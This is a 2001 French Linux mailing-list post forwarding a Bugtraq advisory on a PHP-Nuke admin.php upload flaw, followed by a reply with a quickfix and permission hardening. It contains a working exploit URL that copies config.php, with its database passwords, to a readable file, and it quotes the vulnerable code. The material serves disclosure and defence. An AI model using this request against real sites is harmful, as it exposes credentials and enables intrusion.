[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[linux] PHP Bug



Je suppose que vous lisez tous bugtrack ...
mais savez-vous que

http://127.0.0.1/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdi
r=/images/&userfile=config.php&userfile_name=hacked.txt

http://127.0.0.1/images/hacked.txt and you will see config.php that as

Et linuxbe.org ? Et ben non, eux ils savent configurer un apache, c'est pas
comme moi :) ....


Dominique

Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"

This at least works for PostNuke 0.62. I have not tested the latest PostNuke
0.63 - it may be vulnerable as well...

And btw; if you're not going to use the filemanager, disallow write access
for the webuser (usually nobody or www) to all files/directories below
webroot.


Magnus Skjegstad

----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...


> Explanation
> Do you need sql password?
>
>
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
> t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted just go to
> http://www.server.net/images/hacked.txt and you will see config.php that
as
> everyone knows contain the sql's passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try to dont be a
> SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain you the bug... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
>     copy($userfile,$basedir.$wdir.$userfile_name);
>     $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
>     // This need a rewrite -------------------------------------> OMG! WE
> AGREEEEEEEE lmao
>     //include("header.php");
>     //GraphicAdmin($hlpfile);
>     //html_header();
>     //displaydir();
>     $wdir2="/";
>     chdir($basedir . $wdir2);
>     //CloseTable();
>     //include("footer.php");
>     Header("Location: admin.php?op=FileManager");
>     exit;
> }



[ Soyez précis dans vos sujets svp afin de déterminer directement  ]
[ le type de demande...                                            ]
[ Pour vous (dés)inscrire, aller sur http://unixtech.be/ml.php     ]
[ Archives de la mailing list: http://archives.unixtech.be/linux/  ]
[ http://unixtech.be              Contact: listmaster@unixtech.be  ]